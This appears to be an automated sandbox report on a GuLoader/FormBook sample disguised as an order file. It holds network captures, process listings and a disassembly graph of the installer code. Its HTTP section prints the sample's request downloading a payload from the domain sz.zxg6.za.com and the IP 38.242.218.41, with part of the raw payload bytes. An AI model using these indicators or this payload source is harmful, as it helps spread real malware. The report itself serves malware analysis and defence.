                                        Aug 28, 2024 12:25:21.840101004 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.840131998 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.840198994 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.840204000 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.840217113 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.840331078 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.840368032 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.840401888 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.840538025 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.840538025 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.840547085 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.840557098 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.840603113 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.840943098 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:26.655699015 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:26.655946016 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:42.969021082 CEST4986580192.168.11.2038.242.218.41

                                        UDP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Aug 28, 2024 12:25:20.602490902 CEST4994553192.168.11.201.1.1.1
                                        Aug 28, 2024 12:25:20.709916115 CEST53499451.1.1.1192.168.11.20

                                        DNS Queries

                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                        Aug 28, 2024 12:25:20.602490902 CEST192.168.11.201.1.1.10xc92fStandard query (0)sz.zxg6.za.comA (IP address)IN (0x0001)false

                                        DNS Answers

                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                        Aug 28, 2024 12:25:20.709916115 CEST1.1.1.1192.168.11.200xc92fNo error (0)sz.zxg6.za.com38.242.218.41A (IP address)IN (0x0001)false

                                        HTTP Request Dependency Graph

                                        • sz.zxg6.za.com

                                        HTTP Packets

                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        0192.168.11.204986538.242.218.41807964C:\Users\user\Desktop\TRIAL_ORDER_CP.exe
                                        TimestampBytes transferredDirectionData
                                        Aug 28, 2024 12:25:20.899656057 CEST175OUTGET /.ex/ELFyaa85.bin HTTP/1.1
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                        Host: sz.zxg6.za.com
                                        Cache-Control: no-cache
                                        Aug 28, 2024 12:25:21.088315964 CEST1289INHTTP/1.1 200 OK
                                        Date: Wed, 28 Aug 2024 10:25:20 GMT
                                        Server: Apache
                                        Last-Modified: Wed, 28 Aug 2024 02:57:37 GMT
                                        Accept-Ranges: bytes
                                        Content-Length: 288832
                                        Content-Type: application/octet-stream
                                        Data Raw: 56 7b 8f ca 82 f2 8b 70 d0 d3 47 21 07 a5 b0 1d 03 ea b1 e3 ae 6c 1c 14 5b 47 cd e0 4c 6b 43 03 5c d3 95 92 91 97 30 92 7e 8d f6 cf 0e b5 85 27 f4 92 0f 58 98 53 92 0c 72 71 4a 88 d7 56 69 d8 fc 48 e7 3a 99 cd 70 66 4f a3 d6 7a 62 a7 2a 00 4b e7 82 76 c2 3a c4 8d ae 48 3b fb a5 cb ca 79 99 9c 2d 3c d2 2c f3 52 93 4a ac 47 b6 cb d1 2e 3a 12 62 b1 f3 55 46 b1 b5 05 65 44 a6 cf 2e ed c6 08 db eb c0 e4 0b 02 dd a7 ba de 72 16 c1 86 bd c7 01 f1 1b 9d 98 55 0f 49 92 e7 2a c1 31 ca c1 b8 55 87 36 11 1c 8e 88 1a f6 48 a8 ae 6c 2e b3 f1 41 42 b7 22 46 de 8c c3 61 ac 2f d7 96 86 79 f8 ca 39 b6 d0 72 ab 54 c9 ad 76 ef 3d 59 1b 5c 83 2f e6 18 c9 b1 bf 38 7f f8 3b 56 29 56 79 69 27 e0 7a d9 0a 24 37 50 06 d4 ab e6 42 df 8b 60 cd b3 8c f8 1c 7b 2e 6e 27 2f a1 60 96 ec bb 4e 97 09 4b 84 07 d8 c9 60 eb 2c 9f 64 f3 00 0c ec ed 4e 59 6f ce ee f3 b6 89 9d 1d de 82 18 8f 02 f2 07 3d a1 6d 55 52 ff ad d1 a1 7d 01 e1 df 42 2c 50 e7 eb 80 b9 39 23 16 00 74 ed cb b9 f1 00 e6 56 3c 28 f5 af df 3e 9e 1d 99 d3 3a 1e 7b 5d 16 [TRUNCATED]
                                        Data Ascii: V{pG!l[GLkC\0~'XSrqJViH:pfOzb*Kv:H;y-<,RJG.:bUFeD.rUI*1U6Hl.AB"Fa/y9rTv=Y\/8;V)Vyi'z$7PB`{.n'/`NK`,dNYo=mUR}B,P9#tV<(>:{]xp-!{Ako'~(BK|!-3i_F5ML=nRI_LHle5C5r0KxeJr}j5d3~qHGV<#U8w.[8iqWcrQM\^AA/5"2X-s@Iw+$2lZt3B\beAIk):{b"zyq!|v7Q*xjUgC$\yz>N~1H-`*4[@f@T01R5\O"H,xcx)9qlcd:Ht]y)Gz7;Msz}u>^0h:{3r;{f(t60x6#:3[iV-0vuNs<%\3H`0TU9y24`AUF<R-ZxQ{sE9)KS`L*!*L|*d]FSH&p6LY5?poqc@Mo: [TRUNCATED]
                                        Aug 28, 2024 12:25:21.088330984 CEST1289INData Raw: 43 cd c0 23 13 ee ee 02 30 0a 87 43 b9 2a 19 28 4d d2 e6 4d a2 a5 36 d9 4d 04 a5 bd eb ef 32 85 91 a4 ea 11 c3 37 f0 9c c3 12 29 62 b1 19 63 92 0d de 40 a7 0d 21 09 ca 7f 9b 08 e0 76 25 0a fb a0 a1 69 d2 db 41 37 ac f3 70 43 9c 77 d8 83 9b 8f 9e
                                        Data Ascii: C#0C*(MM6M27)bc@!v%iA7pCw]=1Q{)L;@nTRKUOA&brM]S6UrK!H)aj@I?^v`=^Qxw;;N<
                                        Aug 28, 2024 12:25:21.088432074 CEST1289INData Raw: 33 9a 48 60 30 d4 c4 54 81 ec 55 8f 14 95 d0 b2 89 d1 b2 f6 10 1b d7 a6 39 b9 fd 99 fd da a7 8e 8e fc 79 c1 32 34 88 ca 9f bd d1 60 41 d1 55 46 3c 1d 11 52 9e 2d a6 5a d8 78 97 f5 51 7b 8d 8e 8d 73 87 45 bf c4 b3 39 fa c5 29 14 19 c1 4b 10 d0 19
                                        Data Ascii: 3H`0TU9y24`AUF<R-ZxQ{sE9)KS`L*!*L|*d]FSH&p6LY5?poqc@Mo:Ux:]MX%j}9:SVMz|;2z:z;~-6C#0
                                        Aug 28, 2024 12:25:21.088445902 CEST1289INData Raw: 7a b8 d2 9b ab e2 e4 0c aa 0d 3e bf 4e 7e 16 ae 31 fb 80 04 48 e6 f3 2d fd 60 dd 99 2a b7 34 fe 5b f9 40 66 8b cf 16 b1 15 a6 bd d6 40 a3 a0 54 86 30 0d b1 f4 99 f9 d7 31 52 35 5c 4f 22 a9 9c a5 a3 19 ec f0 48 99 01 2c 8d 78 9f 96 db a2 c5 bb 63
                                        Data Ascii: z>N~1H-`*4[@f@T01R5\O"H,xcx)9qlcd:Ht]y)Gz7;Msz}u>^0h:{3r;{f(t60x6#:3[iV-0vuNs<%\3H`0T
                                        Aug 28, 2024 12:25:21.088458061 CEST1289INData Raw: e4 53 73 de d9 97 52 c6 37 4c 4b b0 a8 67 0e b5 af 6d 6b 20 aa f4 7b b4 9d 55 8f 5c 89 28 c5 a1 67 99 a7 22 61 d3 22 cf 40 42 76 f3 cb f2 46 65 4a 0e 32 a8 56 5b fb d9 a8 69 9f e4 89 4a 6f d5 bb 34 cf 83 ef cd 3c 52 2c 7d 7d 87 9a 26 0d eb ad 51
                                        Data Ascii: SsR7LKgmk {U\(g"a"@BvFeJ2V[iJo4<R,}}&Q`Hfd4X}27[Xr<&S3Y@,r@pjo/=Th6@CB\QSTJ.i:xa/mu5VBZ'!$zJW\%
                                        Aug 28, 2024 12:25:21.088469028 CEST1289INData Raw: f2 ff 27 55 ee bd cb 81 e7 2a 5d 5d 57 2c e2 16 ee e4 e4 56 8c 67 e1 69 bd c1 f1 21 17 a8 0f 64 d0 b4 e7 57 04 24 54 f9 d7 96 86 bb 2d c3 99 8b 3b 19 5f e8 58 5a 27 ec 5c b7 65 42 db 78 ea a7 72 a2 5f 9a a4 31 12 6e be da 4b 89 83 c0 53 24 81 5c
                                        Data Ascii: 'U*]]W,Vgi!dW$T-;_XZ'\eBxr_1nKS$\ZH6y.>b yowk&sc!l}(uGvWOT@45e+xe?^)D<_oa\F%f?LlJ -(<T,r:<$N|
                                        Aug 28, 2024 12:25:21.088499069 CEST1289INData Raw: 43 c3 df fb 6f 3d 95 81 c4 48 cd 77 75 53 7e fd af 67 1a d0 32 57 91 cd 17 f0 43 e5 43 ab d2 3b 5e d1 7a 08 ff cb 4f 37 ea a0 3e 0f 17 65 b0 40 47 91 76 a5 7f ee c6 78 82 e0 a7 59 ff bb 1e 20 1a 65 f7 b8 63 a2 4e 36 35 00 fd c5 aa 9c d5 c9 fe d2
                                        Data Ascii: Co=HwuS~g2WCC;^zO7>e@GvxY ecN65B]}#JtxQ{{*^R{jZ<N&;150G`U/ocCp.z7HG.:ZLxJgdo"S|f<iFj`K
                                        Aug 28, 2024 12:25:21.088614941 CEST1289INData Raw: 28 7d 77 39 83 ca 26 10 99 5c 00 dc 95 4c b4 de 4e ae d5 4f db 43 d1 e7 91 67 66 52 5f ea ad e5 ae c1 ce 72 90 f2 7f 9c db 72 4b 2d c2 9d cc 00 51 3a 0e e9 d9 a8 f3 19 73 c4 f8 c1 ab 8d 23 53 7d 54 f5 b8 00 0f 09 b5 3b 27 6d a7 af c0 47 eb 04 21
                                        Data Ascii: (}w9&\LNOCgfR_rrK-Q:s#S}T;'mG!+eK1'\o0N<c+L6;w!i[<5zXl(d%uuK8&HWH4c$y^|0%S<8ZvvCbi!i9
                                        Aug 28, 2024 12:25:21.088645935 CEST1289INData Raw: c4 eb a7 58 c2 89 cc 34 d7 c2 70 c3 b4 e1 d6 8e 7c 0a 8b 85 83 40 ec 71 4c 45 71 06 e1 16 e4 ff df e8 27 d1 4a 99 65 c1 a3 55 aa 61 40 1e f5 e9 6c 48 c2 6f 6f 05 b1 3f 48 fe a7 8d 6c 5c af f4 b6 8d 00 d4 22 ed a0 25 6a 7d 39 c4 8f f4 da 3a 53 56
                                        Data Ascii: X4p|@qLEq'JeUa@lHoo?Hl\"%j}9:SV5m?~es8l3QY@0u*((MMxeJ7J)*cAAm%U[k\?A4a$vf^C{*JL\kmt
                                        Aug 28, 2024 12:25:21.088658094 CEST1289INData Raw: f1 b8 f1 79 93 55 7a e9 f1 bc c4 b3 4a f1 c4 bf 3b 0f 85 2a e2 4d 31 77 d7 30 d2 b0 cf 93 3a 20 2d 3a e8 4e df 7b c0 05 f9 7e 3b 97 e1 8a b8 08 36 34 4a b1 a7 d8 d5 46 06 c6 6d f4 0a 0f a9 4f d7 76 96 36 63 f2 95 b1 e1 4b d1 f3 c0 24 52 73 3a ee
                                        Data Ascii: yUzJ;*M1w0: -:N{~;64JFmOv6cK$Rs:-YQ'?L:nN8S8#&G)TT'[H+}>:st.vq24!./RP7zaL}[&2({p8eU25 )29U
                                        Aug 28, 2024 12:25:21.273863077 CEST1289INData Raw: b3 dc 98 62 5e de 34 ae 2a f3 67 49 36 05 15 c1 78 af 89 60 32 54 02 9c d8 e8 1d 3c e8 fc 20 cb e8 88 66 39 97 51 1b 13 23 a1 cd cb 21 01 ea 50 63 6e 21 b8 ae 0d 34 63 f5 ec e0 55 34 4e 58 0c 49 a2 df 90 6b 53 8e 23 d2 61 f6 e1 5c 2e 79 b7 cb 9f
                                        Data Ascii: b^4*gI6x`2T< f9Q#!Pcn!4cU4NXIkS#a\.y gGb^p~e}2j%*,C$JtX\@?Z%2SlEJDXFIgV:5X5\OD.5!LBHa7"^9e|#XeWl\nsMJx


                                        Statistics

                                        CPU Usage

                                        Click to jump to process

                                        Memory Usage

                                        Click to jump to process

                                        High Level Behavior Distribution

                                        Click to dive into process behavior distribution

                                        Behavior

                                        Click to jump to process

                                        System Behavior

                                        General

                                        Target ID:0
                                        Start time:06:24:15
                                        Start date:28/08/2024
                                        Path:C:\Users\user\Desktop\TRIAL_ORDER_CP.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\TRIAL_ORDER_CP.exe"
                                        Imagebase:0x400000
                                        File size:1'014'480 bytes
                                        MD5 hash:5A14D64B70FC7106CB6C14BE1AAA7482
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.270766627678.0000000004C73000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:low
                                        Has exited:true

                                        General

                                        Target ID:3
                                        Start time:06:25:11
                                        Start date:28/08/2024
                                        Path:C:\Users\user\Desktop\TRIAL_ORDER_CP.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\TRIAL_ORDER_CP.exe"
                                        Imagebase:0x400000
                                        File size:1'014'480 bytes
                                        MD5 hash:5A14D64B70FC7106CB6C14BE1AAA7482
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.270972099407.0000000033830000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.270972099407.0000000033830000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                        Reputation:low
                                        Has exited:true

                                        General

                                        Target ID:5
                                        Start time:06:25:33
                                        Start date:28/08/2024
                                        Path:C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s
                                        Imagebase:0x140000000
                                        File size:16'696'840 bytes
                                        MD5 hash:731FB4B2E5AFBCADAABB80D642E056AC
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate
                                        Has exited:false

                                        General

                                        Target ID:6
                                        Start time:06:25:33
                                        Start date:28/08/2024
                                        Path:C:\Windows\SysWOW64\Robocopy.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\SysWOW64\Robocopy.exe"
                                        Imagebase:0x1e0000
                                        File size:142'336 bytes
                                        MD5 hash:6B2AE9D48535CE68D53D56E65248BB4C
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.272502680086.00000000043D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.272502680086.00000000043D0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.272502162049.00000000029C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.272502162049.00000000029C0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                        Reputation:low
                                        Has exited:true

                                        General

                                        Target ID:7
                                        Start time:06:28:07
                                        Start date:28/08/2024
                                        Path:C:\Windows\explorer.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\Explorer.EXE
                                        Imagebase:0x7ff707160000
                                        File size:4'849'904 bytes
                                        MD5 hash:5EA66FF5AE5612F921BC9DA23BAC95F7
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:false

                                        Disassembly

                                        Reset < >

                                          Execution Graph

                                          Execution Coverage:28.4%
                                          Dynamic/Decrypted Code Coverage:0%
                                          Signature Coverage:18.8%
                                          Total number of Nodes:709
                                          Total number of Limit Nodes:20
                                          execution_graph 3058 706823e9 3059 70682453 3058->3059 3060 7068245e GlobalAlloc 3059->3060 3061 7068247d 3059->3061 3060->3059 3068 7068170d 3069 706815b6 GlobalFree 3068->3069 3071 70681725 3069->3071 3070 7068176b GlobalFree 3071->3070 3072 70681740 3071->3072 3073 70681757 VirtualFree 3071->3073 3072->3070 3073->3070 3084 70681000 3085 7068101b 5 API calls 3084->3085 3086 70681019 3085->3086 3092 706810e1 3093 70681111 3092->3093 3094 706812b0 GlobalFree 3093->3094 3095 70681240 GlobalFree 3093->3095 3096 706811d7 GlobalAlloc 3093->3096 3097 706812ab 3093->3097 3098 7068135a 2 API calls 3093->3098 3099 7068129a GlobalFree 3093->3099 3100 70681312 2 API calls 3093->3100 3101 7068116b GlobalAlloc 3093->3101 3102 70681381 lstrcpyW 3093->3102 3095->3093 3096->3093 3097->3094 3098->3093 3099->3093 3100->3093 3101->3093 3102->3093 3103 70682d43 3104 70682d5b 3103->3104 3105 7068162f 2 API calls 3104->3105 3106 70682d76 3105->3106 2537 40352f SetErrorMode GetVersionExW 2538 403583 GetVersionExW 2537->2538 2539 4035bb 2537->2539 2538->2539 2540 403612 2539->2540 2541 406948 5 API calls 2539->2541 2542 4068d8 3 API calls 2540->2542 2541->2540 2543 403628 lstrlenA 2542->2543 2543->2540 2544 403638 2543->2544 2545 406948 5 API calls 2544->2545 2546 40363f 2545->2546 2547 406948 5 API calls 2546->2547 2548 403646 2547->2548 2549 406948 5 API calls 2548->2549 2550 403652 #17 OleInitialize SHGetFileInfoW 2549->2550 2626 406554 lstrcpynW 2550->2626 2553 4036a1 GetCommandLineW 2627 406554 lstrcpynW 2553->2627 2555 4036b3 2556 405e50 CharNextW 2555->2556 2557 4036d9 CharNextW 2556->2557 2565 4036eb 2557->2565 2558 4037ed 2559 403801 GetTempPathW 2558->2559 2628 4034fe 2559->2628 2561 403819 2562 403873 DeleteFileW 2561->2562 2563 40381d GetWindowsDirectoryW lstrcatW 2561->2563 2638 4030a2 GetTickCount GetModuleFileNameW 2562->2638 2566 4034fe 12 API calls 2563->2566 2564 405e50 CharNextW 2564->2565 2565->2558 2565->2564 2571 4037ef 2565->2571 2568 403839 2566->2568 2568->2562 2570 40383d GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 2568->2570 2569 403887 2577 405e50 CharNextW 2569->2577 2608 40392e 2569->2608 2618 40393e 2569->2618 2572 4034fe 12 API calls 2570->2572 2736 406554 lstrcpynW 2571->2736 2575 40386b 2572->2575 2575->2562 2575->2618 2581 4038a6 2577->2581 2579 403ab0 2582 403b34 ExitProcess 2579->2582 2583 403ab8 GetCurrentProcess OpenProcessToken 2579->2583 2580 403a8c 2806 405bb4 2580->2806 2587 403904 2581->2587 2588 403947 2581->2588 2585 403ad0 LookupPrivilegeValueW AdjustTokenPrivileges 2583->2585 2586 403b04 2583->2586 2585->2586 2592 406948 5 API calls 2586->2592 2737 405f2b 2587->2737 2722 405b1f 2588->2722 2595 403b0b 2592->2595 2598 403b20 ExitWindowsEx 2595->2598 2600 403b2d 2595->2600 2598->2582 2598->2600 2599 403966 2602 40397e 2599->2602 2753 406554 lstrcpynW 2599->2753 2603 40140b 2 API calls 2600->2603 2607 4039a4 wsprintfW 2602->2607 2602->2618 2621 406314 40 API calls 2602->2621 2622 406591 21 API calls 2602->2622 2624 403aa2 CloseHandle 2602->2624 2733 405b37 CreateProcessW 2602->2733 2796 4068b1 FindFirstFileW 2602->2796 2603->2582 2604 403923 2752 406554 lstrcpynW 2604->2752 2609 406591 21 API calls 2607->2609 2666 403c26 2608->2666 2612 4039c8 2609->2612 2613 4039e0 GetFileAttributesW 2612->2613 2614 403a1a SetCurrentDirectoryW 2612->2614 2726 405aa8 CreateDirectoryW 2612->2726 2754 405b02 CreateDirectoryW 2612->2754 2615 4039f7 2613->2615 2616 4039ec DeleteFileW 2613->2616 2729 406314 MoveFileExW 2614->2729 2615->2602 2615->2607 2615->2618 2757 405c60 2615->2757 2616->2615 2799 403b4c 2618->2799 2621->2602 2622->2602 2624->2618 2626->2553 2627->2555 2629 406802 5 API calls 2628->2629 2630 40350a 2629->2630 2631 403514 2630->2631 2810 405e23 lstrlenW CharPrevW 2630->2810 2631->2561 2634 405b02 2 API calls 2635 403522 2634->2635 2813 406073 2635->2813 2817 406044 GetFileAttributesW CreateFileW 2638->2817 2640 4030e2 2661 4030f2 2640->2661 2818 406554 lstrcpynW 2640->2818 2642 403108 2819 405e6f lstrlenW 2642->2819 2646 403119 GetFileSize 2647 403213 2646->2647 2659 403130 2646->2659 2824 40303e 2647->2824 2649 40321c 2651 40324c GlobalAlloc 2649->2651 2649->2661 2859 4034e7 SetFilePointer 2649->2859 2835 4034e7 SetFilePointer 2651->2835 2653 40327f 2657 40303e 6 API calls 2653->2657 2655 403235 2658 4034d1 ReadFile 2655->2658 2656 403267 2836 4032d9 2656->2836 2657->2661 2662 403240 2658->2662 2659->2647 2659->2653 2659->2661 2663 40303e 6 API calls 2659->2663 2856 4034d1 2659->2856 2661->2569 2662->2651 2662->2661 2663->2659 2664 403273 2664->2661 2664->2664 2665 4032b0 SetFilePointer 2664->2665 2665->2661 2667 406948 5 API calls 2666->2667 2668 403c3a 2667->2668 2669 403c40 2668->2669 2670 403c52 2668->2670 2888 40649b wsprintfW 2669->2888 2671 406422 3 API calls 2670->2671 2672 403c82 2671->2672 2673 403ca1 lstrcatW 2672->2673 2675 406422 3 API calls 2672->2675 2676 403c50 2673->2676 2675->2673 2880 403efc 2676->2880 2679 405f2b 18 API calls 2680 403cd3 2679->2680 2681 403d67 2680->2681 2684 406422 3 API calls 2680->2684 2682 405f2b 18 API calls 2681->2682 2683 403d6d 2682->2683 2685 403d7d LoadImageW 2683->2685 2687 406591 21 API calls 2683->2687 2686 403d05 2684->2686 2688 403e23 2685->2688 2689 403da4 RegisterClassW 2685->2689 2686->2681 2690 403d26 lstrlenW 2686->2690 2693 405e50 CharNextW 2686->2693 2687->2685 2692 40140b 2 API calls 2688->2692 2691 403dda SystemParametersInfoW CreateWindowExW 2689->2691 2721 403e2d 2689->2721 2694 403d34 lstrcmpiW 2690->2694 2695 403d5a 2690->2695 2691->2688 2696 403e29 2692->2696 2697 403d23 2693->2697 2694->2695 2698 403d44 GetFileAttributesW 2694->2698 2699 405e23 3 API calls 2695->2699 2701 403efc 22 API calls 2696->2701 2696->2721 2697->2690 2700 403d50 2698->2700 2702 403d60 2699->2702 2700->2695 2703 405e6f 2 API calls 2700->2703 2704 403e3a 2701->2704 2889 406554 lstrcpynW 2702->2889 2703->2695 2706 403e46 ShowWindow 2704->2706 2707 403ec9 2704->2707 2709 4068d8 3 API calls 2706->2709 2890 4056ac OleInitialize 2707->2890 2711 403e5e 2709->2711 2710 403ecf 2713 403ed3 2710->2713 2714 403eeb 2710->2714 2712 403e6c GetClassInfoW 2711->2712 2715 4068d8 3 API calls 2711->2715 2717 403e80 GetClassInfoW RegisterClassW 2712->2717 2718 403e96 DialogBoxParamW 2712->2718 2720 40140b 2 API calls 2713->2720 2713->2721 2716 40140b 2 API calls 2714->2716 2715->2712 2716->2721 2717->2718 2719 40140b 2 API calls 2718->2719 2719->2721 2720->2721 2721->2618 2723 406948 5 API calls 2722->2723 2724 40394c lstrlenW 2723->2724 2725 406554 lstrcpynW 2724->2725 2725->2599 2727 405af4 2726->2727 2728 405af8 GetLastError 2726->2728 2727->2612 2728->2727 2730 403a29 CopyFileW 2729->2730 2731 406328 2729->2731 2730->2602 2730->2618 2898 40619a 2731->2898 2734 405b76 2733->2734 2735 405b6a CloseHandle 2733->2735 2734->2602 2735->2734 2736->2559 2932 406554 lstrcpynW 2737->2932 2739 405f3c 2933 405ece CharNextW CharNextW 2739->2933 2742 403910 2742->2618 2751 406554 lstrcpynW 2742->2751 2743 406802 5 API calls 2749 405f52 2743->2749 2744 405f83 lstrlenW 2745 405f8e 2744->2745 2744->2749 2746 405e23 3 API calls 2745->2746 2748 405f93 GetFileAttributesW 2746->2748 2747 4068b1 2 API calls 2747->2749 2748->2742 2749->2742 2749->2744 2749->2747 2750 405e6f 2 API calls 2749->2750 2750->2744 2751->2604 2752->2608 2753->2602 2755 405b12 2754->2755 2756 405b16 GetLastError 2754->2756 2755->2612 2756->2755 2758 405f2b 18 API calls 2757->2758 2759 405c80 2758->2759 2760 405c88 DeleteFileW 2759->2760 2761 405c9f 2759->2761 2762 405dd6 2760->2762 2763 405dca 2761->2763 2939 406554 lstrcpynW 2761->2939 2762->2615 2763->2762 2769 4068b1 2 API calls 2763->2769 2765 405cc5 2766 405cd8 2765->2766 2767 405ccb lstrcatW 2765->2767 2768 405e6f 2 API calls 2766->2768 2770 405cde 2767->2770 2768->2770 2772 405de4 2769->2772 2771 405cee lstrcatW 2770->2771 2773 405cf9 lstrlenW FindFirstFileW 2770->2773 2771->2773 2772->2762 2774 405de8 2772->2774 2777 405dbf 2773->2777 2794 405d1b 2773->2794 2775 405e23 3 API calls 2774->2775 2776 405dee 2775->2776 2779 405c18 5 API calls 2776->2779 2777->2763 2778 405da2 FindNextFileW 2782 405db8 FindClose 2778->2782 2778->2794 2781 405dfa 2779->2781 2783 405e14 2781->2783 2784 405dfe 2781->2784 2782->2777 2786 4055d9 28 API calls 2783->2786 2784->2762 2787 4055d9 28 API calls 2784->2787 2786->2762 2789 405e0b 2787->2789 2788 405c60 64 API calls 2788->2794 2791 406314 40 API calls 2789->2791 2790 4055d9 28 API calls 2790->2778 2792 405e12 2791->2792 2792->2762 2793 4055d9 28 API calls 2793->2794 2794->2778 2794->2788 2794->2790 2794->2793 2795 406314 40 API calls 2794->2795 2940 406554 lstrcpynW 2794->2940 2941 405c18 2794->2941 2795->2794 2797 4068d2 2796->2797 2798 4068c7 FindClose 2796->2798 2797->2602 2798->2797 2800 403b64 2799->2800 2801 403b56 CloseHandle 2799->2801 2952 403b91 2800->2952 2801->2800 2804 405c60 71 API calls 2805 403a7f OleUninitialize 2804->2805 2805->2579 2805->2580 2808 405bc9 2806->2808 2807 403a9a ExitProcess 2808->2807 2809 405bdd MessageBoxIndirectW 2808->2809 2809->2807 2811 40351c 2810->2811 2812 405e3f lstrcatW 2810->2812 2811->2634 2812->2811 2814 406080 GetTickCount GetTempFileNameW 2813->2814 2815 4060b6 2814->2815 2816 40352d 2814->2816 2815->2814 2815->2816 2816->2561 2817->2640 2818->2642 2820 405e7d 2819->2820 2821 405e83 CharPrevW 2820->2821 2822 40310e 2820->2822 2821->2820 2821->2822 2823 406554 lstrcpynW 2822->2823 2823->2646 2825 403047 2824->2825 2826 40305f 2824->2826 2829 403050 DestroyWindow 2825->2829 2830 403057 2825->2830 2827 403067 2826->2827 2828 40306f GetTickCount 2826->2828 2860 406984 2827->2860 2832 4030a0 2828->2832 2833 40307d CreateDialogParamW ShowWindow 2828->2833 2829->2830 2830->2649 2832->2649 2833->2832 2835->2656 2838 4032f2 2836->2838 2837 403320 2840 4034d1 ReadFile 2837->2840 2838->2837 2877 4034e7 SetFilePointer 2838->2877 2841 40332b 2840->2841 2842 403454 2841->2842 2843 40346a 2841->2843 2844 40333d GetTickCount 2841->2844 2842->2664 2845 4034ac 2843->2845 2849 40346e 2843->2849 2844->2842 2848 403369 2844->2848 2847 4034d1 ReadFile 2845->2847 2846 4034d1 ReadFile 2846->2848 2847->2842 2848->2842 2848->2846 2852 4033bf GetTickCount 2848->2852 2853 4033e4 MulDiv wsprintfW 2848->2853 2875 4060f6 WriteFile 2848->2875 2849->2842 2850 4034d1 ReadFile 2849->2850 2851 4060f6 WriteFile 2849->2851 2850->2849 2851->2849 2852->2848 2864 4055d9 2853->2864 2878 4060c7 ReadFile 2856->2878 2859->2655 2861 4069a1 PeekMessageW 2860->2861 2862 40306d 2861->2862 2863 406997 DispatchMessageW 2861->2863 2862->2649 2863->2861 2865 4055f4 2864->2865 2866 405696 2864->2866 2867 405610 lstrlenW 2865->2867 2868 406591 21 API calls 2865->2868 2866->2848 2869 405639 2867->2869 2870 40561e lstrlenW 2867->2870 2868->2867 2872 40564c 2869->2872 2873 40563f SetWindowTextW 2869->2873 2870->2866 2871 405630 lstrcatW 2870->2871 2871->2869 2872->2866 2874 405652 SendMessageW SendMessageW SendMessageW 2872->2874 2873->2872 2874->2866 2876 406114 2875->2876 2876->2848 2877->2837 2879 4034e4 2878->2879 2879->2659 2881 403f10 2880->2881 2897 40649b wsprintfW 2881->2897 2883 403f81 2884 403fb5 22 API calls 2883->2884 2886 403f86 2884->2886 2885 403cb1 2885->2679 2886->2885 2887 406591 21 API calls 2886->2887 2887->2886 2888->2676 2889->2681 2891 40451f SendMessageW 2890->2891 2892 4056cf 2891->2892 2895 401389 2 API calls 2892->2895 2896 4056f6 2892->2896 2893 40451f SendMessageW 2894 405708 OleUninitialize 2893->2894 2894->2710 2895->2892 2896->2893 2897->2883 2899 4061f0 GetShortPathNameW 2898->2899 2900 4061ca 2898->2900 2902 406205 2899->2902 2903 40630f 2899->2903 2925 406044 GetFileAttributesW CreateFileW 2900->2925 2902->2903 2904 40620d wsprintfA 2902->2904 2903->2730 2906 406591 21 API calls 2904->2906 2905 4061d4 CloseHandle 